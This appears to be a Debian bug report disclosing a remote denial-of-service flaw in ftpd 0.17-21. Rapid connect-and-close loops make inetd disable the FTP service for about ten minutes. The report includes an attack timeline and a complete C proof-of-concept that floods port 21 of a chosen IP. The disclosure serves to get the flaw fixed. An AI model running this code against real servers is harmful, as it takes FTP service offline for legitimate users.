Package: ftpd
Status: install ok installed
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Architecture: i386
Version: 0.17-21
I'm currently running Debian testing with a few packages from unstable.
I've discovered a vulnerability which would allow a remote denial of
service attack in the ftpd program. It is caused by someone rapidly
opening a socket, connecting server, then closeing the socket, and
I've written a small example which can be examined below.
Here's a timeline of what an attack might look like:
* program rapidly opens a socket, connect()'s, then closes the socket
* inetd redundantly reports: in.ftpd: connect from [host]
* inetd, then, reports the message: ftp/tcp server failing (looping),
service terminated
* existing connections continue to work, however,
* since ftpd is down, no new connections can be established
* after about ten minutes, ftpd is restarted
As promised, here's an example program. This will attempt to use the
first arguement as an IP address if one is supplied, otherwise it will
use 127.0.0.1.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int sock;
struct sockaddr_in addr;
void open_socket()
{
sock = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr))
< 0 )
{
fprintf(stderr, "Error\n");
close(sock);
exit(1);
}
}
int main(int argc, char * argv[])
{
char * address = "127.0.0.1";
int port = 21;
if (argc == 2)
address = argv[1];
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(address);
addr.sin_port = htons(port);
int over = 0;
printf("Assaulting server\n");
while (over < 100)
{
open_socket();
close(sock);
over++;
}
return 0;
}
